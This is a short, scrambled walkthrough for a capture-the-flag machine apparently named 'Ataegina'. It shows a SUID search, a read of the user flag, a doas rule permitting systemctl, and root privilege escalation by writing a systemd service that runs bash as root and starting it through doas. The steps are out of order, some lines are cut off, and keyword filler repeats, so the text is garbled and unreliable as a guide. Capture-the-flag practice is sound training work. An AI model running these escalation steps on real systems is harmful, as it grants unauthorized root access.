Walkthrough !!better!! — Ataegina

find / -perm -4000 2>/dev/null Found: /usr/bin/doas (OpenBSD’s doas alternative on Linux).

Here’s a structured for a CTF machine or challenge named “Ataegina” (likely from a platform like HackTheBox, VulnHub, or TryHackMe). ataegina walkthrough

We now have an interactive shell as ataegina . cat /home/ataegina/user.txt THMataegina_user_flag 4. Root Privilege Escalation Check SUID binaries: find / -perm -4000 2&gt

cat <<EOF > /tmp/root.service [Service] ExecStart=/bin/bash -c 'cat /root/root.txt > /tmp/root_flag' [Install] WantedBy=multi-user.target EOF Run as root via doas: ataegina walkthrough

doas -u root systemctl link /tmp/root.service doas -u root systemctl start root.service Retrieve flag:

permit nopass ataegina as root cmd /usr/bin/systemctl Create a service:

Check /etc/doas.conf :